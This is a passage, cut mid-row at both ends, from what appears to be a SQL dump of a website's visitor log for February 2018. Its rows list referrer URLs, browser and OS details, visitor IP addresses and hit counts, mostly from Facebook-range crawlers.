,0),(19239,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.61','000',1,0),(19240,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.140','000',3,0),(19241,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.171','000',3,0),(19242,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','71.244.254.236','000',2,0),(19243,'2018-02-04','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(19244,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.116','000',1,0),(19245,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.219','000',1,0),(19246,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.169','000',1,0),(19247,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.223','000',1,0),(19248,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.23','000',1,0),(19249,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.214','000',3,0),(19250,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.116','000',1,0),(19251,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.154','000',1,0),(19252,'2018-02-04','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.25.34','000',1,0),(19253,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.80','000',1,0),(19254,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.117','000',2,0),(19255,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.240','000',1,0),(19256,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.229','000',1,0),(19257,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.75','000',2,0),(19258,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.70','000',1,0),(19259,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.116','000',1,0),(19260,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.198','000',1,0),(19261,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.117','000',1,0),(19262,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.18','000',1,0),(19263,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','72.83.222.118','000',1,0),(19264,'2018-02-04','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.28','000',1,0),(19265,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.107','000',1,0),(19266,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.132','000',1,0),(19267,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.147','000',1,0),(19268,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.115','000',1,0),(19269,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.211','000',1,0),(19270,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.66','000',1,0),(19271,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.100','000',2,0),(19272,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.134','000',2,0),(19273,'2018-02-04','https://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','54.191.78.243','000',3,0),(19274,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.238','000',2,0),(19275,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.31','000',1,0),(19276,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.208','000',1,0),(19277,'2018-02-04','http://m.facebook.com','AppleWebKit','iPad','602.2.14','','173.66.188.131','000',1,0),(19278,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.106','000',1,0),(19279,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.118','000',1,0),(19280,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.162','000',1,0),(19281,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.131','000',1,0),(19282,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.143','000',1,0),(19283,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.130','000',1,0),(19284,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.177','000',2,0),(19285,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.118','000',1,0),(19286,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.193','000',1,0),(19287,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.241','000',1,0),(19288,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.114','000',1,0),(19289,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.77','000',1,0),(19290,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.121','000',1,0),(19291,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.39','000',1,0),(19292,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.119','000',1,0),(19293,'2018-02-04','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','163.172.255.139','000',1,0),(19294,'2018-02-04','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.67','000',1,0),(19295,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.69','000',2,0),(19296,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.205','000',1,0),(19297,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.214','000',1,0),(19298,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.18','000',2,0),(19299,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.221','000',2,0),(19300,'2018-02-04','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.165','000',2,0),(19301,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.172','000',2,0),(19302,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.250','000',2,0),(19303,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.119','000',1,0),(19304,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.221','000',1,0),(19305,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.112','000',3,0),(19306,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.198','000',1,0),(19307,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.238','000',2,0),(19308,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.120','000',4,0),(19309,'2018-02-05','https://zphiblgz.org','Firefox','Windows','40.1','','105.100.40.75','000',2,0),(19310,'2018-02-05','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','129.78.110.124','000',2,0),(19311,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.203','000',4,0),(19312,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.210','000',1,0),(19313,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.59','000',3,0),(19314,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.108','000',1,0),(19315,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.22','000',1,0),(19316,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.212','000',2,0),(19317,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.192','000',2,0),(19318,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.113','000',1,0),(19319,'2018-02-05','http://zphiblgz.org/','Firefox','Windows','31.0','','188.165.4.128','000',1,0),(19320,'2018-02-05','https://zphiblgz.org','Firefox','Windows','40.1','','183.82.20.167','000',2,0),(19321,'2018-02-05','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.67','000',1,0),(19322,'2018-02-05','https://zphiblgz.org','Firefox','Windows','40.1','','191.187.36.215','000',2,0),(19323,'2018-02-05','https://zphiblgz.org','Chrome','Windows','64.0.3282.140','','86.51.188.169','000',1,0),(19324,'2018-02-05','http://m.facebook.com','AppleWebKit','iPad','604.5.6','','100.47.11.97','000',1,0),(19325,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.115','000',2,0),(19326,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.118','000',1,0),(19327,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.198','000',3,0),(19328,'2018-02-05','https://zphiblgz.org','Firefox','Windows','40.0','','178.136.239.45','000',1,0),(19329,'2018-02-05','https://zphiblgz.org','Firefox','Macintosh','57.0','','100.36.75.210','000',9,0),(19330,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.80','000',2,0),(19331,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.83','000',2,0),(19332,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.74','000',1,0),(19333,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.228.121','000',1,0),(19334,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.22','000',2,0),(19335,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.118','000',1,0),(19336,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.107','000',3,0),(19337,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.80','000',1,0),(19338,'2018-02-05','http://zphiblgz.org/scholarship/','Chrome','Macintosh','63.0.3239.132','','71.121.235.184','000',3,0),(19339,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.198','000',4,0),(19340,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.234','000',1,0),(19341,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.207','000',1,0),(19342,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.168','000',2,0),(19343,'2018-02-05','https://zphiblgz.org','Chrome','Windows','64.0.3282.119','','155.201.35.181','000',3,0),(19344,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.84','000',3,0),(19345,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.202','000',2,0),(19346,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.13','000',1,0),(19347,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.186','000',2,0),(19348,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.99','000',2,0),(19349,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.152','000',1,0),(19350,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.204','000',2,0),(19351,'2018-02-05','https://www.bing.com/','MSIE','Windows','11.0','','100.36.71.6','000',6,0),(19352,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.79','000',3,0),(19353,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.24','000',2,0),(19354,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.85','000',3,0),(19355,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.212','000',1,0),(19356,'2018-02-05','https://zphiblgz.org','Firefox','Windows','57.0','','51.254.97.56','000',2,0),(19357,'2018-02-05','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.99','000',1,0),(19358,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.250','000',2,0),(19359,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.130','000',1,0),(19360,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.32','000',6,0),(19361,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.116','000',3,0),(19362,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.132','000',1,0),(19363,'2018-02-05','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.9.26','000',2,0),(19364,'2018-02-05','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.6.104','000',1,0),(19365,'2018-02-05','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.79','000',1,0),(19366,'2018-02-05','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.78','000',1,0),(19367,'2018-02-05','https://zphiblgz.org/wp-config-85528777.php','Chrome','Linux','41.0.2272.118','','66.102.6.106','000',1,0),(19368,'2018-02-05','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',9,0),(19369,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.119','000',1,0),(19370,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.84','000',1,0),(19371,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.222','000',4,0),(19372,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.221','000',1,0),(19373,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.17','000',1,0),(19374,'2018-02-05','https://zphiblgz.org/scholarship/','Firefox','Windows','57.0','','198.51.197.42','000',1,0),(19375,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.140','000',2,0),(19376,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.131','000',3,0),(19377,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.248','000',1,0),(19378,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.22','000',1,0),(19379,'2018-02-05','https://www.google.com/','Chrome','Chrome OS','63.0.3239.140','','64.150.11.64','000',2,0),(19380,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.203','000',3,0),(19381,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.54','000',1,0),(19382,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.214','000',1,0),(19383,'2018-02-05','https://zphiblgz.org','Firefox','Windows','5.0','','158.69.229.134','000',2,0),(19384,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.125','000',1,0),(19385,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.66','000',1,0),(19386,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.19','000',1,0),(19387,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.113','000',1,0),(19388,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.52','000',2,0),(19389,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.119','000',1,0),(19390,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.25','000',1,0),(19391,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.211','000',1,0),(19392,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.23','000',1,0),(19393,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.137','000',1,0),(19394,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.222','000',1,0),(19395,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.181','000',1,0),(19396,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.140','000',1,0),(19397,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.123','000',2,0),(19398,'2018-02-05','https://zphiblgz.org','Firefox','Windows','40.1','','88.246.71.118','000',2,0),(19399,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.71','000',1,0),(19400,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.118','000',1,0),(19401,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.91','000',2,0),(19402,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.118','000',2,0),(19403,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.118','000',2,0),(19404,'2018-02-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(19405,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.21','000',2,0),(19406,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.225','000',2,0),(19407,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.194','000',3,0),(19408,'2018-02-05','https://www.google.com/','Chrome','Macintosh','63.0.3239.132','','100.16.228.140','000',7,0),(19409,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.178','000',1,0),(19410,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.197','000',1,0),(19411,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.118','000',2,0),(19412,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.146','000',1,0),(19413,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.59','000',2,0),(19414,'2018-02-05','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(19415,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.113','000',1,0),(19416,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.119','000',2,0),(19417,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.244','000',1,0),(19418,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.46','000',2,0),(19419,'2018-02-05','https://zphiblgz.org','Safari','Macintosh','11.0.1','','165.230.224.51','000',1,0),(19420,'2018-02-05','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1688.mJQTvcETllFnXJ3de2NbhPUwSOaPU8lO53OfEC-P3TucxBM7vTkimY8g1ZFdaxpH.c2b31a8a7141bb6affac9b3c6702c41afcc8f16b&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlmNkdLRVlvQkZZY0NUa3FpMkdyYlA3YUhoTlllZWZ0VmJvby1JZGkweHNLNDBaU3FjZHhha3BLdWg5UlVIM2NFdVoyT1pCZzRFaXQyWkFlUjVHUVV3dw&b64e=2&sign=0c57aff00126fa5f335d97994c67bec0&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93XfrtkbafT3GbxNlvfaFPTG_Vb7-gGgEK7u4fNLC7h04dmRGHuEcHRm9RyhfoQKZVUtdH_RyzIcsSE0Y2BgHyp6qOn9TF1djeW6puSLQYWDwZOo2VpKnIEoqz_4M9A&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCX2SNpZ0Ix_kKvYfgInGzAsJH9EtW2IU8n9cq_mLy9Cr0BLS5NF6eG-V-K1c6zS72KN0iUz60-ByQ&l10n=ru&cts=1517867937996&mc=5.39013044709','MSIE','Windows','10.0','','95.27.90.192','000',1,0),(19421,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.143','000',1,0),(19422,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.130','000',1,0),(19423,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.167','000',1,0),(19424,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.133','000',1,0),(19425,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.202','000',1,0),(19426,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.33','000',1,0),(19427,'2018-02-05','https://www.google.com/','Chrome','Windows','63.0.3239.132','','71.121.235.128','000',3,0),(19428,'2018-02-05','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.27','000',2,0),(19429,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.201','000',2,0),(19430,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.90','000',1,0),(19431,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.200','000',2,0),(19432,'2018-02-05','https://zphiblgz.org','Safari','iPhone','11.0','','98.231.130.173','000',2,0),(19433,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.214','000',2,0),(19434,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.75','000',1,0),(19435,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.210','000',2,0),(19436,'2018-02-05','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','98.231.130.173','000',4,0),(19437,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.210','000',1,0),(19438,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.208','000',1,0),(19439,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.126','000',1,0),(19440,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.15','000',3,0),(19441,'2018-02-05','https://zphiblgz.org','Firefox','Windows','40.1','','177.5.165.110','000',2,0),(19442,'2018-02-05','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.27','000',1,0),(19443,'2018-02-05','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(19444,'2018-02-05','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','207.172.176.137','000',2,0),(19445,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.196','000',3,0),(19446,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.166','000',1,0),(19447,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.149','000',2,0),(19448,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.24','000',1,0),(19449,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.224','000',3,0),(19450,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.158','000',1,0),(19451,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.88','000',3,0),(19452,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.205','000',2,0),(19453,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.240','000',2,0),(19454,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.215','000',1,0),(19455,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.115','000',2,0),(19456,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.221','000',1,0),(19457,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.31','000',3,0),(19458,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.187','000',2,0),(19459,'2018-02-05','https://zphiblgz.org/','Edge','Windows','14.14393','','77.120.125.23','000',2,0),(19460,'2018-02-05','https://www.google.com/','Chrome','Linux','64.0.3282.119','','50.226.149.83','000',3,0),(19461,'2018-02-05','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','108.48.61.120','000',3,0),(19462,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.123','000',2,0),(19463,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.125','000',1,0),(19464,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.219','000',1,0),(19465,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.224','000',1,0),(19466,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.115','000',1,0),(19467,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.86','000',1,0),(19468,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.153','000',2,0),(19469,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.184','000',1,0),(19470,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.160','000',2,0),(19471,'2018-02-05','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.32','000',1,0),(19472,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.129','000',1,0),(19473,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.246','000',6,0),(19474,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.34','000',1,0),(19475,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.183','000',1,0),(19476,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.112','000',1,0),(19477,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.58','000',2,0),(19478,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.237','000',2,0),(19479,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.112','000',1,0),(19480,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.200','000',3,0),(19481,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.30','000',1,0),(19482,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.55','000',1,0),(19483,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.122','000',2,0),(19484,'2018-02-05','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.78','000',1,0),(19485,'2018-02-05','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.95','000',1,0),(19486,'2018-02-05','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.35','000',1,0),(19487,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.117','000',1,0),(19488,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.10','000',2,0),(19489,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.199','000',1,0),(19490,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.56','000',1,0),(19491,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.180','000',1,0),(19492,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.132','000',2,0),(19493,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.143','000',1,0),(19494,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.58','000',1,0),(19495,'2018-02-05','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.28','000',1,0),(19496,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.217','000',1,0),(19497,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.225','000',1,0),(19498,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.105','000',2,0),(19499,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.82','000',1,0),(19500,'2018-02-05','https://www.google.com/','Chrome','Windows','63.0.3239.132','','71.126.169.194','000',16,0),(19501,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.65','000',1,0),(19502,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.142','000',1,0),(19503,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.93','000',1,0),(19504,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.242','000',1,0),(19505,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.134','000',2,0),(19506,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.19